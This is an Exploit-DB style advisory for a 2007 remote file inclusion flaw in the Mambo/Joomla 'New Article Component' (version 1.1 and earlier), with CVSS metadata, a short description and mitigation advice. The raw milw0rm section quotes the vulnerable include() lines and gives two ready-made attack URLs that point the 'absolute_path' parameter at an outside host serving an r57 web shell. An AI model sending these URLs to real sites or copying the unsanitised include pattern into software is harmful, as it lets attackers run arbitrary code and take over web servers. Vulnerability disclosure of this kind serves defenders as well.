Mambo/Joomla Component New Article Component

vendor:

New Article Component

by:

Cold z3ro

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: New Article Component

Affected Version From: Up to version 1.1

Affected Version To: Up to version 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI

This vulnerability allows an attacker to include remote files by manipulating the 'absolute_path' parameter in the 'com_articles.php' and 'html/com_articles.php' files. By providing a malicious URL as the 'absolute_path' parameter, an attacker can execute arbitrary code on the server.

Mitigation:

The vendor should release a patch to fix the issue. In the meantime, users are advised to restrict access to the affected files or disable the component if not needed.

Source

Exploit-DB raw data:

=======================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple 
RFI
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.php');     <= 
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.php');     <= Line 
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-14]